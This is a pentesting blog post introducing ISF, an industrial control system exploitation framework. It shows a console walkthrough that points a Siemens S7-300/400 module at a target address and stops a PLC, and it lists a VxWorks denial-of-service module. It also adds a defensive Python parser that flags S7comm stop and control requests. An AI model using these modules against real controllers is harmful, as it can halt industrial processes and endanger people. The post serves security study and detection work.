Pentesting and Security Personal Blog

isf

Introduction to the framework

ISF (Industrial Exploitation Framework) is a Python-based exploitation framework for industrial environments. It is built on the open source project routersploit.

Although it currently has little content, it is still worth having around, either to extend yourself or to wait for future updates.

Details

ICS protocol clients

| Name | Path | Description |
| --- | --- | --- |
| Modbus_tcp_client | icssploit/clients/modbus_tcp_client.py | Modbus-TCP client tools |

Exploit scripts

| Name | Path | Description |
| --- | --- | --- |
| S7_300_400_plc_control | icssploit/modules/exploits/plcs/siemens/s7_300_400_plc_control.py | S7-300/400 PLC start and stop scripts |
| Vxworks_rpc_dos | icssploit/modules/exploits/plcs/vxworks/vxworks_rpc_dos.py | VxWorks RPC remote denial of service (CVE-2015-7599) |

Install

Python dependencies

  • gnureadline (OSX only)
  • requests
  • paramiko
  • beautifulsoup4
  • pysnmp
  • scapy

Install on Kali 2

    git clone https://github.com/dark-lbp/isf/
    cd isf
    python isf.py

Use

Help

Exploits

You can use the TAB key to complete the module path.

Options

Show options

    Isf (S7-300 / 400 PLC Control)> show options

    Target options:

       Name       Current settings     Description
       ----       ----------------     -----------
       Target                          Target address e.g. 192.168.1.1
       Port       102                  Target Port


    Module options:

       Name       Current settings     Description
       ----       ----------------     -----------
       Slot       2                    CPU slot number.
       Command    1                    Command 0: start plc, 1: stop plc.


    Isf (S7-300 / 400 PLC Control)>

Set an option

    Isf (S7-300 / 400 PLC Control)> set target 192.168.70.210
    [+] {'Target': '192.168.70.210'}

Run the module

    Isf (S7-300 / 400 PLC Control)> run
    [*] Running module ...
    [+] Target is alive
    [*] Sending packet to target
    [*] Stop plc
    Isf (S7-300 / 400 PLC Control)

Display the module information

    Isf (S7-300 / 400 PLC Control)> show info

    Name:
    S7-300 / 400 PLC Control

    Description:
    Use S7comm command to start / stop plc.

    Devices:
    - Siemens S7-300 and S7-400 programmable logic controllers (PLCs)

    Authors:
    - wenzhe zhu <jtrkid [at] gmail.com>

    References:

    Isf (S7-300 / 400 PLC Control)>
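
As an added example (not part of ISF or this post), here is a small Python parser that a defender can run over frames captured on TCP/102 to flag the S7comm "PLC Control" and "PLC Stop" job requests this module relies on. The function-code values follow the names used by the Wireshark s7comm dissector; the sample frames are constructed headers with zero padding, not complete requests.

```python
"""Flag S7comm Job requests that change PLC run state (added example)."""
import struct

# S7comm function codes as named by the Wireshark s7comm dissector.
PLC_CONTROL = 0x28   # "PLC Control" (used for PLC start)
PLC_STOP = 0x29      # "PLC Stop"
ROSCTR_JOB = 0x01    # Job: request from client to PLC


def s7_function_code(frame: bytes):
    """Return the S7 function code of a Job PDU, or None when the
    frame is not a well-formed TPKT/COTP/S7comm Job request."""
    # TPKT: version(1) reserved(1) length(2); COTP DT header: 3 bytes
    if len(frame) < 4 + 3 + 10 + 1 or frame[0] != 0x03:
        return None
    if struct.unpack("!H", frame[2:4])[0] != len(frame):
        return None
    cotp_len = frame[4]                # COTP length excludes itself
    s7 = frame[4 + 1 + cotp_len:]
    # S7 header: 0x32 proto id, ROSCTR, reserved(2), pdu ref(2),
    # parameter length(2), data length(2); parameters follow
    if len(s7) < 10 or s7[0] != 0x32 or s7[1] != ROSCTR_JOB:
        return None
    param_len = struct.unpack("!H", s7[6:8])[0]
    if param_len < 1 or len(s7) < 10 + param_len:
        return None
    return s7[10]                      # first parameter byte = function


def classify(frame: bytes) -> str:
    """Label a frame for alerting: plc-stop, plc-control or other."""
    code = s7_function_code(frame)
    if code == PLC_STOP:
        return "plc-stop"
    if code == PLC_CONTROL:
        return "plc-control"
    return "other"


def build_sample(function_code: int, param_len: int = 6) -> bytes:
    """Constructed test frame: headers + function code + zero padding.
    This is not a valid request; it only exercises the parser."""
    params = bytes([function_code]) + b"\x00" * (param_len - 1)
    s7 = (bytes([0x32, ROSCTR_JOB, 0, 0, 0, 1])
          + struct.pack("!HH", len(params), 0) + params)
    body = b"\x02\xf0\x80" + s7        # COTP DT header + S7 PDU
    return b"\x03\x00" + struct.pack("!H", 4 + len(body)) + body


if __name__ == "__main__":
    for code in (PLC_STOP, PLC_CONTROL, 0x04):
        print(hex(code), classify(build_sample(code)))
```

Hook `classify` into whatever captures your port 102 traffic; any frame labelled plc-stop or plc-control coming from a host that is not an engineering workstation deserves an alert.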

Documentation

You can find it here:

github: https://github.com/dark-lbp/isf

Thanks for reading!

maninwire =D

Know your enemy!


Written by maninwire@gmail.com in Tools on Tue 01 August 2017. Tags: exploit, tool, industrial, scada, framework.